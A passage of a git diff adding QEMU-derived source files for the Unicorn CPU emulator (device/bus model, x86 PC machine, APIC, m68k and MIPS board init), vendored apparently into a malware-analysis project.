"hw/qdev.h" +#include "qapi/error.h" +#include "qapi/qmp/qerror.h" + + +static void bus_add_child(BusState *bus, DeviceState *child) +{ + char name[32]; + BusChild *kid = g_malloc0(sizeof(*kid)); + + kid->index = bus->max_index++; + kid->child = child; + object_ref(OBJECT(kid->child)); + + QTAILQ_INSERT_HEAD(&bus->children, kid, sibling); + + /* This transfers ownership of kid->child to the property. */ + snprintf(name, sizeof(name), "child[%d]", kid->index); + object_property_add_link(OBJECT(bus), name, + object_get_typename(OBJECT(child)), + (Object **)&kid->child, + NULL, /* read-only property */ + 0, /* return ownership on prop deletion */ + NULL); +} + +void qdev_set_parent_bus(DeviceState *dev, BusState *bus) +{ + dev->parent_bus = bus; + object_ref(OBJECT(bus)); + bus_add_child(bus, dev); +} + +/* Create a new device. This only initializes the device state structure + and allows properties to be set. qdev_init should be called to + initialize the actual device emulation. */ +DeviceState *qdev_create(BusState *bus, const char *name) +{ + DeviceState *dev; + + dev = qdev_try_create(bus, name); + if (!dev) { + abort(); + } + + return dev; +} + +DeviceState *qdev_try_create(BusState *bus, const char *type) +{ +#if 0 + DeviceState *dev; + + if (object_class_by_name(NULL, type) == NULL) { // no need to fix. aq + return NULL; + } + dev = DEVICE(object_new(NULL, type)); // no need to fix. aq + if (!dev) { + return NULL; + } + + if (!bus) { + bus = sysbus_get_default(); + } + + qdev_set_parent_bus(dev, bus); + object_unref(OBJECT(dev)); + return dev; +#endif + return NULL; +} + +/* Initialize a device. Device properties should be set before calling + this function. IRQs and MMIO regions should be connected/mapped after + calling this function. + On failure, destroy the device and return negative value. + Return 0 on success. */ +int qdev_init(DeviceState *dev) +{ + return 0; +} + +BusState *qdev_get_parent_bus(DeviceState *dev) +{ + return dev->parent_bus; +} + +static void qbus_realize(BusState *bus, DeviceState *parent, const char *name) +{ +} + +static void bus_unparent(struct uc_struct *uc, Object *obj) +{ + BusState *bus = BUS(uc, obj); + BusChild *kid; + + while ((kid = QTAILQ_FIRST(&bus->children)) != NULL) { + DeviceState *dev = kid->child; + object_unparent(uc, OBJECT(dev)); + } + if (bus->parent) { + QLIST_REMOVE(bus, sibling); + bus->parent->num_child_bus--; + bus->parent = NULL; + } +} + +void qbus_create_inplace(void *bus, size_t size, const char *typename, + DeviceState *parent, const char *name) +{ + object_initialize(NULL, bus, size, typename); // unused, so no need to fix. aq + qbus_realize(bus, parent, name); +} + +BusState *qbus_create(const char *typename, DeviceState *parent, const char *name) +{ + BusState *bus; + + bus = BUS(NULL, object_new(NULL, typename)); // no need to fix. aq + qbus_realize(bus, parent, name); + + return bus; +} + +static bool device_get_realized(struct uc_struct *uc, Object *obj, Error **errp) +{ + DeviceState *dev = DEVICE(uc, obj); + return dev->realized; +} + +static int device_set_realized(struct uc_struct *uc, Object *obj, bool value, Error **errp) +{ + DeviceState *dev = DEVICE(uc, obj); + DeviceClass *dc = DEVICE_GET_CLASS(uc, dev); + BusState *bus; + Error *local_err = NULL; + + if (dev->hotplugged && !dc->hotpluggable) { + error_set(errp, QERR_DEVICE_NO_HOTPLUG, object_get_typename(obj)); + return -1; + } + + if (value && !dev->realized) { +#if 0 + if (!obj->parent) { + static int unattached_count; + gchar *name = g_strdup_printf("device[%d]", unattached_count++); + + object_property_add_child(container_get(qdev_get_machine(), + "/unattached"), + name, obj, &error_abort); + g_free(name); + } +#endif + + if (dc->realize) { + if (dc->realize(uc, dev, &local_err)) + return -1; + } + + if (local_err != NULL) { + goto fail; + } + + if (local_err != NULL) { + goto post_realize_fail; + } + + QLIST_FOREACH(bus, &dev->child_bus, sibling) { + object_property_set_bool(uc, OBJECT(bus), true, "realized", + &local_err); + if (local_err != NULL) { + goto child_realize_fail; + } + } + if (dev->hotplugged) { + device_reset(dev); + } + dev->pending_deleted_event = false; + } else if (!value && dev->realized) { + Error **local_errp = NULL; + QLIST_FOREACH(bus, &dev->child_bus, sibling) { + local_errp = local_err ? NULL : &local_err; + object_property_set_bool(uc, OBJECT(bus), false, "realized", + local_errp); + } + if (dc->unrealize) { + local_errp = local_err ? NULL : &local_err; + dc->unrealize(dev, local_errp); + } + dev->pending_deleted_event = true; + } + + if (local_err != NULL) { + goto fail; + } + + dev->realized = value; + return 0; + +child_realize_fail: + QLIST_FOREACH(bus, &dev->child_bus, sibling) { + object_property_set_bool(uc, OBJECT(bus), false, "realized", + NULL); + } + +post_realize_fail: + if (dc->unrealize) { + dc->unrealize(dev, NULL); + } + +fail: + error_propagate(errp, local_err); + return -1; +} + +static void device_initfn(struct uc_struct *uc, Object *obj, void *opaque) +{ + DeviceState *dev = DEVICE(uc, obj); + + dev->instance_id_alias = -1; + dev->realized = false; + + object_property_add_bool(uc, obj, "realized", + device_get_realized, device_set_realized, NULL); +} + +static void device_post_init(struct uc_struct *uc, Object *obj) +{ +} + +/* Unlink device from bus and free the structure. */ +static void device_finalize(struct uc_struct *uc, Object *obj, void *opaque) +{ +} + +static void device_class_base_init(ObjectClass *class, void *data) +{ +} + + +static void device_class_init(struct uc_struct *uc, ObjectClass *class, void *data) +{ +} + +void device_reset(DeviceState *dev) +{ +} + +Object *qdev_get_machine(struct uc_struct *uc) +{ + return container_get(uc, object_get_root(uc), "/machine"); +} + +static const TypeInfo device_type_info = { + TYPE_DEVICE, + TYPE_OBJECT, + + sizeof(DeviceClass), + sizeof(DeviceState), + NULL, + + device_initfn, + device_post_init, + device_finalize, + + NULL, + + device_class_init, + device_class_base_init, + NULL, + + true, +}; + +static void qbus_initfn(struct uc_struct *uc, Object *obj, void *opaque) +{ +} + +static void bus_class_init(struct uc_struct *uc, ObjectClass *class, void *data) +{ + class->unparent = bus_unparent; +} + +static void qbus_finalize(struct uc_struct *uc, Object *obj, void *opaque) +{ + BusState *bus = BUS(uc, obj); + + g_free((char *)bus->name); +} + +static const TypeInfo bus_info = { + TYPE_BUS, + TYPE_OBJECT, + + sizeof(BusClass), + sizeof(BusState), + NULL, + + qbus_initfn, + NULL, + qbus_finalize, + + NULL, + + bus_class_init, + NULL, + NULL, + + true, +}; + +void qdev_register_types(struct uc_struct *uc) +{ + type_register_static(uc, &bus_info); + type_register_static(uc, &device_type_info); +} diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/hw/i386/Makefile.objs b/ai_anti_malware/unicorn/unicorn-master/qemu/hw/i386/Makefile.objs new file mode 100644 index 0000000..649888e --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/hw/i386/Makefile.objs @@ -0,0 +1 @@ +obj-y += pc.o pc_piix.o diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/hw/i386/pc.c b/ai_anti_malware/unicorn/unicorn-master/qemu/hw/i386/pc.c new file mode 100644 index 0000000..6377bee --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/hw/i386/pc.c @@ -0,0 +1,181 @@ +/* + * QEMU PC System Emulator + * + * Copyright (c) 2003-2004 Fabrice Bellard + * + * Permission is hereby granted, free of charge, to any person obtaining a copy + * of this software and associated documentation files (the "Software"), to deal + * in the Software without restriction, including without limitation the rights + * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell + * copies of the Software, and to permit persons to whom the Software is + * furnished to do so, subject to the following conditions: + * + * The above copyright notice and this permission notice shall be included in + * all copies or substantial portions of the Software. + * + * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR + * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, + * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL + * THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER + * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, + * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN + * THE SOFTWARE. + */ +/* Modified for Unicorn Engine by Nguyen Anh Quynh, 2015 */ + +#include "hw/hw.h" +#include "hw/i386/pc.h" +#include "sysemu/sysemu.h" +#include "qapi-visit.h" + + +/* XXX: add IGNNE support */ +void cpu_set_ferr(CPUX86State *s) +{ +// qemu_irq_raise(ferr_irq); +} + +/* TSC handling */ +uint64_t cpu_get_tsc(CPUX86State *env) +{ + return cpu_get_ticks(); +} + +/* SMM support */ + +static cpu_set_smm_t smm_set; +static void *smm_arg; + +void cpu_smm_register(cpu_set_smm_t callback, void *arg) +{ + assert(smm_set == NULL); + assert(smm_arg == NULL); + smm_set = callback; + smm_arg = arg; +} + +void cpu_smm_update(CPUX86State *env) +{ + struct uc_struct *uc = x86_env_get_cpu(env)->parent_obj.uc; + + if (smm_set && smm_arg && CPU(x86_env_get_cpu(env)) == uc->cpu) { + smm_set(!!(env->hflags & HF_SMM_MASK), smm_arg); + } +} + +/* IRQ handling */ +int cpu_get_pic_interrupt(CPUX86State *env) +{ + X86CPU *cpu = x86_env_get_cpu(env); + int intno; + + intno = apic_get_interrupt(cpu->apic_state); + if (intno >= 0) { + return intno; + } + /* read the irq from the PIC */ + if (!apic_accept_pic_intr(cpu->apic_state)) { + return -1; + } + + return 0; +} + +DeviceState *cpu_get_current_apic(struct uc_struct *uc) +{ + if (uc->current_cpu) { + X86CPU *cpu = X86_CPU(uc, uc->current_cpu); + return cpu->apic_state; + } else { + return NULL; + } +} + +static X86CPU *pc_new_cpu(struct uc_struct *uc, const char *cpu_model, int64_t apic_id, + Error **errp) +{ + X86CPU *cpu; + Error *local_err = NULL; + + cpu = cpu_x86_create(uc, cpu_model, &local_err); + if (local_err != NULL) { + error_propagate(errp, local_err); + return NULL; + } + + object_property_set_int(uc, OBJECT(cpu), apic_id, "apic-id", &local_err); + object_property_set_bool(uc, OBJECT(cpu), true, "realized", &local_err); + + if (local_err) { + error_propagate(errp, local_err); + object_unref(uc, OBJECT(cpu)); + cpu = NULL; + } + return cpu; +} + +int pc_cpus_init(struct uc_struct *uc, const char *cpu_model) +{ + int i; + Error *error = NULL; + + /* init CPUs */ + if (cpu_model == NULL) { +#ifdef TARGET_X86_64 + cpu_model = "qemu64"; +#else + cpu_model = "qemu32"; +#endif + } + + for (i = 0; i < smp_cpus; i++) { + uc->cpu = (CPUState *)pc_new_cpu(uc, cpu_model, x86_cpu_apic_id_from_index(i), &error); + if (error) { + //error_report("%s", error_get_pretty(error)); + error_free(error); + return -1; + } + } + + return 0; +} + +static void pc_machine_initfn(struct uc_struct *uc, Object *obj, void *opaque) +{ +} + +static void pc_machine_class_init(struct uc_struct *uc, ObjectClass *oc, void *data) +{ +} + +static const TypeInfo pc_machine_info = { + TYPE_PC_MACHINE, + TYPE_MACHINE, + + sizeof(PCMachineClass), + sizeof(PCMachineState), + NULL, + + pc_machine_initfn, + NULL, + NULL, + + NULL, + + pc_machine_class_init, + NULL, + NULL, + + true, + + NULL, + NULL, + + // should this be added somehow? + //.interfaces = (InterfaceInfo[]) { { } }, +}; + +void pc_machine_register_types(struct uc_struct *uc) +{ + type_register_static(uc, &pc_machine_info); +} diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/hw/i386/pc_piix.c b/ai_anti_malware/unicorn/unicorn-master/qemu/hw/i386/pc_piix.c new file mode 100644 index 0000000..a5ea862 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/hw/i386/pc_piix.c @@ -0,0 +1,78 @@ +/* + * QEMU PC System Emulator + * + * Copyright (c) 2003-2004 Fabrice Bellard + * + * Permission is hereby granted, free of charge, to any person obtaining a copy + * of this software and associated documentation files (the "Software"), to deal + * in the Software without restriction, including without limitation the rights + * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell + * copies of the Software, and to permit persons to whom the Software is + * furnished to do so, subject to the following conditions: + * + * The above copyright notice and this permission notice shall be included in + * all copies or substantial portions of the Software. + * + * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR + * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, + * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL + * THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER + * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, + * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN + * THE SOFTWARE. + */ +/* Modified for Unicorn Engine by Nguyen Anh Quynh, 2015 */ + +#include "hw/i386/pc.h" +#include "hw/boards.h" +#include "exec/address-spaces.h" +#include "uc_priv.h" + + +/* Make sure that guest addresses aligned at 1Gbyte boundaries get mapped to + * host addresses aligned at 1Gbyte boundaries. This way we can use 1GByte + * pages in the host. + */ +#define GIGABYTE_ALIGN true + +/* PC hardware initialisation */ +static int pc_init1(struct uc_struct *uc, MachineState *machine) +{ + return pc_cpus_init(uc, machine->cpu_model); +} + +static int pc_init_pci(struct uc_struct *uc, MachineState *machine) +{ + return pc_init1(uc, machine); +} + +static QEMUMachine pc_i440fx_machine_v2_2 = { + "pc_piix", + "pc-i440fx-2.2", + pc_init_pci, + NULL, + 255, + 1, + UC_ARCH_X86, // X86 +}; + +static void pc_generic_machine_class_init(struct uc_struct *uc, ObjectClass *oc, void *data) +{ + MachineClass *mc = MACHINE_CLASS(uc, oc); + QEMUMachine *qm = data; + + mc->family = qm->family; + mc->name = qm->name; + mc->init = qm->init; + mc->reset = qm->reset; + mc->max_cpus = qm->max_cpus; + mc->is_default = qm->is_default; + mc->arch = qm->arch; +} + +void pc_machine_init(struct uc_struct *uc); +void pc_machine_init(struct uc_struct *uc) +{ + qemu_register_machine(uc, &pc_i440fx_machine_v2_2, + TYPE_PC_MACHINE, pc_generic_machine_class_init); +} diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/hw/intc/Makefile.objs b/ai_anti_malware/unicorn/unicorn-master/qemu/hw/intc/Makefile.objs new file mode 100644 index 0000000..7de05c6 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/hw/intc/Makefile.objs @@ -0,0 +1 @@ +obj-$(CONFIG_APIC) += apic.o apic_common.o diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/hw/intc/apic.c b/ai_anti_malware/unicorn/unicorn-master/qemu/hw/intc/apic.c new file mode 100644 index 0000000..957a66e --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/hw/intc/apic.c @@ -0,0 +1,230 @@ +/* + * APIC support + * + * Copyright (c) 2004-2005 Fabrice Bellard + * + * This library is free software; you can redistribute it and/or + * modify it under the terms of the GNU Lesser General Public + * License as published by the Free Software Foundation; either + * version 2 of the License, or (at your option) any later version. + * + * This library is distributed in the hope that it will be useful, + * but WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU + * Lesser General Public License for more details. + * + * You should have received a copy of the GNU Lesser General Public + * License along with this library; if not, see <http://www.gnu.org/licenses/> + */ +#include "qemu/thread.h" +#include "hw/i386/apic_internal.h" +#include "hw/i386/apic.h" +#include "qemu/host-utils.h" +#include "hw/i386/pc.h" + +#include "exec/address-spaces.h" + +#define MAX_APIC_WORDS 8 + +#define SYNC_FROM_VAPIC 0x1 +#define SYNC_TO_VAPIC 0x2 +#define SYNC_ISR_IRR_TO_VAPIC 0x4 + +static void apic_update_irq(APICCommonState *s); + +/* Find first bit starting from msb */ +static int apic_fls_bit(uint32_t value) +{ + return 31 - clz32(value); +} + +/* return -1 if no bit is set */ +static int get_highest_priority_int(uint32_t *tab) +{ + int i; + for (i = 7; i >= 0; i--) { + if (tab[i] != 0) { + return i * 32 + apic_fls_bit(tab[i]); + } + } + return -1; +} + +static void apic_sync_vapic(APICCommonState *s, int sync_type) +{ + VAPICState vapic_state; + //size_t length; + //off_t start; + int vector; + + if (!s->vapic_paddr) { + return; + } + if (sync_type & SYNC_FROM_VAPIC) { + cpu_physical_memory_read(NULL, s->vapic_paddr, &vapic_state, + sizeof(vapic_state)); + s->tpr = vapic_state.tpr; + } + if (sync_type & (SYNC_TO_VAPIC | SYNC_ISR_IRR_TO_VAPIC)) { + //start = offsetof(VAPICState, isr); + //length = offsetof(VAPICState, enabled) - offsetof(VAPICState, isr); + + if (sync_type & SYNC_TO_VAPIC) { + + vapic_state.tpr = s->tpr; + vapic_state.enabled = 1; + //start = 0; + //length = sizeof(VAPICState); + } + + vector = get_highest_priority_int(s->isr); + if (vector < 0) { + vector = 0; + } + vapic_state.isr = vector & 0xf0; + + vapic_state.zero = 0; + + vector = get_highest_priority_int(s->irr); + if (vector < 0) { + vector = 0; + } + vapic_state.irr = vector & 0xff; + + //cpu_physical_memory_write_rom(&address_space_memory, + // s->vapic_paddr + start, + // ((void *)&vapic_state) + start, length); + // FIXME qq + } +} + +static void apic_vapic_base_update(APICCommonState *s) +{ + apic_sync_vapic(s, SYNC_TO_VAPIC); +} + +#define foreach_apic(apic, deliver_bitmask, code) \ +{\ + int __i, __j;\ + for(__i = 0; __i < MAX_APIC_WORDS; __i++) {\ + uint32_t __mask = deliver_bitmask[__i];\ + if (__mask) {\ + for(__j = 0; __j < 32; __j++) {\ + if (__mask & (1U << __j)) {\ + apic = local_apics[__i * 32 + __j];\ + if (apic) {\ + code;\ + }\ + }\ + }\ + }\ + }\ +} + +static void apic_set_base(APICCommonState *s, uint64_t val) +{ + s->apicbase = (val & 0xfffff000) | + (s->apicbase & (MSR_IA32_APICBASE_BSP | MSR_IA32_APICBASE_ENABLE)); + /* if disabled, cannot be enabled again */ + if (!(val & MSR_IA32_APICBASE_ENABLE)) { + s->apicbase &= ~MSR_IA32_APICBASE_ENABLE; + cpu_clear_apic_feature(&s->cpu->env); + s->spurious_vec &= ~APIC_SV_ENABLE; + } +} + +static void apic_set_tpr(APICCommonState *s, uint8_t val) +{ + /* Updates from cr8 are ignored while the VAPIC is active */ + if (!s->vapic_paddr) { + s->tpr = val << 4; + apic_update_irq(s); + } +} + +static uint8_t apic_get_tpr(APICCommonState *s) +{ + apic_sync_vapic(s, SYNC_FROM_VAPIC); + return s->tpr >> 4; +} + +/* signal the CPU if an irq is pending */ +static void apic_update_irq(APICCommonState *s) +{ +} + +void apic_poll_irq(DeviceState *dev) +{ +} + +void apic_sipi(DeviceState *dev) +{ +} + +int apic_get_interrupt(DeviceState *dev) +{ + return 0; +} + +int apic_accept_pic_intr(DeviceState *dev) +{ + return 0; +} + +static void apic_pre_save(APICCommonState *s) +{ + apic_sync_vapic(s, SYNC_FROM_VAPIC); +} + +static void apic_post_load(APICCommonState *s) +{ +#if 0 + if (s->timer_expiry != -1) { + timer_mod(s->timer, s->timer_expiry); + } else { + timer_del(s->timer); + } +#endif +} + +static int apic_realize(struct uc_struct *uc, DeviceState *dev, Error **errp) +{ + return 0; +} + +static void apic_class_init(struct uc_struct *uc, ObjectClass *klass, void *data) +{ + APICCommonClass *k = APIC_COMMON_CLASS(uc, klass); + + k->realize = apic_realize; + k->set_base = apic_set_base; + k->set_tpr = apic_set_tpr; + k->get_tpr = apic_get_tpr; + k->vapic_base_update = apic_vapic_base_update; + k->pre_save = apic_pre_save; + k->post_load = apic_post_load; + //printf("... init apic class\n"); +} + +static const TypeInfo apic_info = { + "apic", + TYPE_APIC_COMMON, + + 0, + sizeof(APICCommonState), + NULL, + + NULL, + NULL, + NULL, + + NULL, + + apic_class_init, +}; + +void apic_register_types(struct uc_struct *uc) +{ + //printf("... register apic types\n"); + type_register_static(uc, &apic_info); +} diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/hw/intc/apic_common.c b/ai_anti_malware/unicorn/unicorn-master/qemu/hw/intc/apic_common.c new file mode 100644 index 0000000..ad7b35a --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/hw/intc/apic_common.c @@ -0,0 +1,274 @@ +/* + * APIC support - common bits of emulated and KVM kernel model + * + * Copyright (c) 2004-2005 Fabrice Bellard + * Copyright (c) 2011 Jan Kiszka, Siemens AG + * + * This library is free software; you can redistribute it and/or + * modify it under the terms of the GNU Lesser General Public + * License as published by the Free Software Foundation; either + * version 2 of the License, or (at your option) any later version. + * + * This library is distributed in the hope that it will be useful, + * but WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU + * Lesser General Public License for more details. + * + * You should have received a copy of the GNU Lesser General Public + * License along with this library; if not, see <http://www.gnu.org/licenses/> + */ +#include "hw/i386/apic.h" +#include "hw/i386/apic_internal.h" +#include "hw/qdev.h" + +#include "uc_priv.h" + + +void cpu_set_apic_base(struct uc_struct *uc, DeviceState *dev, uint64_t val) +{ + if (dev) { + APICCommonState *s = APIC_COMMON(uc, dev); + APICCommonClass *info = APIC_COMMON_GET_CLASS(uc, s); + info->set_base(s, val); + } +} + +uint64_t cpu_get_apic_base(struct uc_struct *uc, DeviceState *dev) +{ + if (dev) { + APICCommonState *s = APIC_COMMON(uc, dev); + return s->apicbase; + } else { + return MSR_IA32_APICBASE_BSP; + } +} + +void cpu_set_apic_tpr(struct uc_struct *uc, DeviceState *dev, uint8_t val) +{ + APICCommonState *s; + APICCommonClass *info; + + if (!dev) { + return; + } + + s = APIC_COMMON(uc, dev); + info = APIC_COMMON_GET_CLASS(uc, s); + + info->set_tpr(s, val); +} + +uint8_t cpu_get_apic_tpr(struct uc_struct *uc, DeviceState *dev) +{ + APICCommonState *s; + APICCommonClass *info; + + if (!dev) { + return 0; + } + + s = APIC_COMMON(uc, dev); + info = APIC_COMMON_GET_CLASS(uc, s); + + return info->get_tpr(s); +} + +void apic_enable_vapic(struct uc_struct *uc, DeviceState *dev, hwaddr paddr) +{ + APICCommonState *s = APIC_COMMON(uc, dev); + APICCommonClass *info = APIC_COMMON_GET_CLASS(uc, s); + + s->vapic_paddr = paddr; + info->vapic_base_update(s); +} + +void apic_handle_tpr_access_report(DeviceState *dev, target_ulong ip, + TPRAccess access) +{ + //APICCommonState *s = APIC_COMMON(NULL, dev); + + //vapic_report_tpr_access(s->vapic, CPU(s->cpu), ip, access); +} + +bool apic_next_timer(APICCommonState *s, int64_t current_time) +{ + int64_t d; + + /* We need to store the timer state separately to support APIC + * implementations that maintain a non-QEMU timer, e.g. inside the + * host kernel. This open-coded state allows us to migrate between + * both models. */ + s->timer_expiry = -1; + + if (s->lvt[APIC_LVT_TIMER] & APIC_LVT_MASKED) { + return false; + } + + d = (current_time - s->initial_count_load_time) >> s->count_shift; + + if (s->lvt[APIC_LVT_TIMER] & APIC_LVT_TIMER_PERIODIC) { + if (!s->initial_count) { + return false; + } + d = ((d / ((uint64_t)s->initial_count + 1)) + 1) * + ((uint64_t)s->initial_count + 1); + } else { + if (d >= s->initial_count) { + return false; + } + d = (uint64_t)s->initial_count + 1; + } + s->next_time = s->initial_count_load_time + (d << s->count_shift); + s->timer_expiry = s->next_time; + return true; +} + +void apic_init_reset(struct uc_struct *uc, DeviceState *dev) +{ + APICCommonState *s = APIC_COMMON(uc, dev); + APICCommonClass *info = APIC_COMMON_GET_CLASS(uc, s); + int i; + + if (!s) { + return; + } + s->tpr = 0; + s->spurious_vec = 0xff; + s->log_dest = 0; + s->dest_mode = 0xf; + memset(s->isr, 0, sizeof(s->isr)); + memset(s->tmr, 0, sizeof(s->tmr)); + memset(s->irr, 0, sizeof(s->irr)); + for (i = 0; i < APIC_LVT_NB; i++) { + s->lvt[i] = APIC_LVT_MASKED; + } + s->esr = 0; + memset(s->icr, 0, sizeof(s->icr)); + s->divide_conf = 0; + s->count_shift = 0; + s->initial_count = 0; + s->initial_count_load_time = 0; + s->next_time = 0; + s->wait_for_sipi = !cpu_is_bsp(s->cpu); + + if (s->timer) { + // timer_del(s->timer); + } + s->timer_expiry = -1; + + if (info->reset) { + info->reset(s); + } +} + +void apic_designate_bsp(struct uc_struct *uc, DeviceState *dev) +{ + APICCommonState *s; + + if (dev == NULL) { + return; + } + + s = APIC_COMMON(uc, dev); + s->apicbase |= MSR_IA32_APICBASE_BSP; +} + +static void apic_reset_common(struct uc_struct *uc, DeviceState *dev) +{ + APICCommonState *s = APIC_COMMON(uc, dev); + APICCommonClass *info = APIC_COMMON_GET_CLASS(uc, s); + bool bsp; + + bsp = cpu_is_bsp(s->cpu); + s->apicbase = APIC_DEFAULT_ADDRESS | + (bsp ? MSR_IA32_APICBASE_BSP : 0) | MSR_IA32_APICBASE_ENABLE; + + s->vapic_paddr = 0; + info->vapic_base_update(s); + + apic_init_reset(uc, dev); + + if (bsp) { + /* + * LINT0 delivery mode on CPU #0 is set to ExtInt at initialization + * time typically by BIOS, so PIC interrupt can be delivered to the + * processor when local APIC is enabled. + */ + s->lvt[APIC_LVT_LINT0] = 0x700; + } +} + +static int apic_common_realize(struct uc_struct *uc, DeviceState *dev, Error **errp) +{ + APICCommonState *s = APIC_COMMON(uc, dev); + APICCommonClass *info; + + if (uc->apic_no >= MAX_APICS) { + error_setg(errp, "%s initialization failed.", + object_get_typename(OBJECT(dev))); + return -1; + } + s->idx = uc->apic_no++; + + info = APIC_COMMON_GET_CLASS(uc, s); + info->realize(uc, dev, errp); + if (!uc->mmio_registered) { + ICCBus *b = ICC_BUS(uc, qdev_get_parent_bus(dev)); + memory_region_add_subregion(b->apic_address_space, 0, &s->io_memory); + uc->mmio_registered = true; + } + + /* Note: We need at least 1M to map the VAPIC option ROM */ + if (!uc->vapic && s->vapic_control & VAPIC_ENABLE_MASK) { + // ram_size >= 1024 * 1024) { // FIXME + uc->vapic = NULL; + } + s->vapic = uc->vapic; + if (uc->apic_report_tpr_access && info->enable_tpr_reporting) { + info->enable_tpr_reporting(s, true); + } + + return 0; +} + +static void apic_common_class_init(struct uc_struct *uc, ObjectClass *klass, void *data) +{ + ICCDeviceClass *idc = ICC_DEVICE_CLASS(uc, klass); + DeviceClass *dc = DEVICE_CLASS(uc, klass); + + dc->reset = apic_reset_common; + idc->realize = apic_common_realize; + /* + * Reason: APIC and CPU need to be wired up by + * x86_cpu_apic_create() + */ + dc->cannot_instantiate_with_device_add_yet = true; + //printf("... init apic common class\n"); +} + +static const TypeInfo apic_common_type = { + TYPE_APIC_COMMON, + TYPE_DEVICE, + + sizeof(APICCommonClass), + sizeof(APICCommonState), + NULL, + + NULL, + NULL, + NULL, + + NULL, + + apic_common_class_init, + NULL, + NULL, + + true, +}; + +void apic_common_register_types(struct uc_struct *uc) +{ + //printf("... register apic common\n"); + type_register_static(uc, &apic_common_type); +} diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/hw/m68k/Makefile.objs b/ai_anti_malware/unicorn/unicorn-master/qemu/hw/m68k/Makefile.objs new file mode 100644 index 0000000..05b7a67 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/hw/m68k/Makefile.objs @@ -0,0 +1 @@ +obj-y += dummy_m68k.o diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/hw/m68k/dummy_m68k.c b/ai_anti_malware/unicorn/unicorn-master/qemu/hw/m68k/dummy_m68k.c new file mode 100644 index 0000000..d155857 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/hw/m68k/dummy_m68k.c @@ -0,0 +1,50 @@ +/* + * Dummy board with just RAM and CPU for use as an ISS. + * + * Copyright (c) 2007 CodeSourcery. + * + * This code is licensed under the GPL + */ + +/* Unicorn Emulator Engine */ +/* By Nguyen Anh Quynh, 2015 */ + +#include "hw/hw.h" +#include "hw/m68k/m68k.h" +#include "hw/boards.h" +#include "exec/address-spaces.h" + + +/* Board init. */ +static int dummy_m68k_init(struct uc_struct *uc, MachineState *machine) +{ + const char *cpu_model = machine->cpu_model; + CPUM68KState *env; + + if (!cpu_model) + cpu_model = "cfv4e"; + + env = cpu_init(uc, cpu_model); + if (!env) { + fprintf(stderr, "Unable to find m68k CPU definition\n"); + return -1; + } + + /* Initialize CPU registers. */ + env->vbr = 0; + env->pc = 0; + + return 0; +} + +void dummy_m68k_machine_init(struct uc_struct *uc) +{ + static QEMUMachine dummy_m68k_machine = { 0 }; + dummy_m68k_machine.name = "dummy", + dummy_m68k_machine.init = dummy_m68k_init, + dummy_m68k_machine.is_default = 1, + dummy_m68k_machine.arch = UC_ARCH_M68K, + + //printf(">>> dummy_m68k_machine_init\n"); + qemu_register_machine(uc, &dummy_m68k_machine, TYPE_MACHINE, NULL); +} diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/hw/mips/Makefile.objs b/ai_anti_malware/unicorn/unicorn-master/qemu/hw/mips/Makefile.objs new file mode 100644 index 0000000..910e23b --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/hw/mips/Makefile.objs @@ -0,0 +1,2 @@ +obj-y += mips_r4k.o +obj-y += addr.o cputimer.o diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/hw/mips/addr.c b/ai_anti_malware/unicorn/unicorn-master/qemu/hw/mips/addr.c new file mode 100644 index 0000000..ff3b952 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/hw/mips/addr.c @@ -0,0 +1,39 @@ +/* + * QEMU MIPS address translation support + * + * Permission is hereby granted, free of charge, to any person obtaining a copy + * of this software and associated documentation files (the "Software"), to deal + * in the Software without restriction, including without limitation the rights + * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell + * copies of the Software, and to permit persons to whom the Software is + * furnished to do so, subject to the following conditions: + * + * The above copyright notice and this permission notice shall be included in + * all copies or substantial portions of the Software. + * + * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR + * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF 